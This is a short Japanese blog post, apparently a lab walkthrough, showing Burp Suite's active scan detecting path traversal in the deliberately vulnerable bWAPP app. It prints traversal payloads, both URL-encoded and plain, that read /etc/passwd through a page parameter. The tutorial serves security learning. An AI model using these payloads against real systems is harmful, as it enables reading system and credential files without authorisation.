Shikata Ga Nai

Private? There is no such things.

Burp SuiteでDirectory Traversal - Filesの診断結果を確認してみた

Hello there, ('ω')ノ

 

Directory Traversal - Filesを選択して。

 

f:id:ThisIsOne:20201013165232p:plain

 

履歴からアクティブスキャンして。

 

f:id:ThisIsOne:20201013165452p:plain

 

ファイルパストラバーサルが検出されたので。

 

f:id:ThisIsOne:20201013171206p:plain

 

f:id:ThisIsOne:20201013165556p:plain

 

レスポンスをRenderで確認して。

 

f:id:ThisIsOne:20201013165700p:plain

 

下記のパラメータをでSmart Decodeして。

..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

 

f:id:ThisIsOne:20201013165841p:plain


下記のパラメータでアクセスすると同じように確認できた。

https://10.4.128.181/bWAPP/directory_traversal_1.php?page=../../../../../../../../../../../../../../../../etc/passwd

 

f:id:ThisIsOne:20201013165944p:plain

 

Best regards, (^^ゞ